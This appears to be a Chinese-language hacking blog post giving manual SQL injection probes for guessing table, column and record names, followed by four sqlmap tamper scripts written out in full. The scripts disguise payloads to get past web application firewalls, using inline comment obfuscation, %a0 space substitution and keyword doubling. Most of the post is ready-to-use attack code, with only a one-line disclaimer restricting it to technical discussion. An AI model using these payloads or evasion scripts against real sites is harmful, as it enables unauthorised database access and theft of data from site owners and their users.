手工注入

基础

test: and 1 = 1, and 1 = 2

判断是否为sql

1。可以在id后面加一个'，查看返回数据

2。and (select count(*) from sysobjects)>0

变量：and user>0      and database>0

sql注入分为数字型，字符型，搜索型

猜解表名

(Select Count(*) from 待猜表明)>=0

猜解列名

(Select Count(待猜列明) from 已知表名)>=0

猜解记录

and (Select Count(已知列名) from 已知表名)>n n为变量数字

..............................................

sqlmap绕过脚本

这里我直接上代码，懒得讲了。对了，别忘了创建一个__init__.py

#!/usr/bin/env python

from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING

__priority__ = PRIORITY.NORMAL

def dependencies():
pass

def tamper(payload, **kwargs):
if payload:
payload = payload.replace("UNION","union/*!88888cas*/")
payload = payload.replace("--","/*!*/--")
payload = payload.replace("SELECT","/*!88888cas*/select")
payload = payload.replace("FROM","/*!99999c*//*!99999c*/from")
payload = payload.replace("#","/*!*/#")
payload = payload.replace("USER()","USER/*!()*/")
payload = payload.replace("DATABASE()","DATABASE/*!()*/")
payload = payload.replace(" ","/*!*/")
payload = payload.replace("=","/*!*/=/*!*/")
payload = payload.replace("AND","/*!*/AND/*!*/")

return payload

就是替换，不要我多讲了吧

#!/usr/bin/env python
# -*- coding:UTF-8 -*-

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
pass

def tamper(payload, **kwargs):

retVal = payload

if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False

for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
# 把原先的+改为%a0即可
retVal += "%a0"
continue

elif payload[i] == '\'':
quote = not quote

elif payload[i] == '"':
doublequote = not doublequote

elif payload[i] == " " and not doublequote and not quote:
# 把原先的+改为%a0即可
retVal += "%a0"
continue

retVal += payload[i]

return retVal

哈哈哈哈

#!/usr/bin/env python
# -*- coding:UTF-8 -*-

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入正则模块，用于字符的替换
import re
# sqlmap中lib\core\enums中的PRIORITY优先级函数
from lib.core.enums import PRIORITY
# 定义脚本优先级
__priority__ = PRIORITY.NORMAL

# 脚本描述函数
def dependencies():
pass

def tamper(payload, **kwargs):
# 将payload进行转存
retVal = payload
if payload:
# 使用re.sub函数不区分大小写替换and和or
# 替换为anandd和oorr
retVal = re.sub(r"(?i)(or)", r"oorr", retVal)
retVal = re.sub(r"(?i)(and)", r"anandd", retVal)
# 把最后修改好的payload返回
return retVal

轰轰轰

#!/usr/bin/env python
# -*- coding:UTF-8 -*-
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
pass

def tamper(payload, **kwargs):
retVal = payload
if payload:
# 把count(*)替换为count(1)
retVal = re.sub(r"(?i)count\(\*\)", r"count(1)", payload)

return retVal

*严正声明：本文仅限于技术讨论与分享，严禁用于非法途径。

不然你就会像我一样，，，，

哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈

好了，今天就到这里，我是铁汉fhoenix。希望今天的内容对你有帮助，再见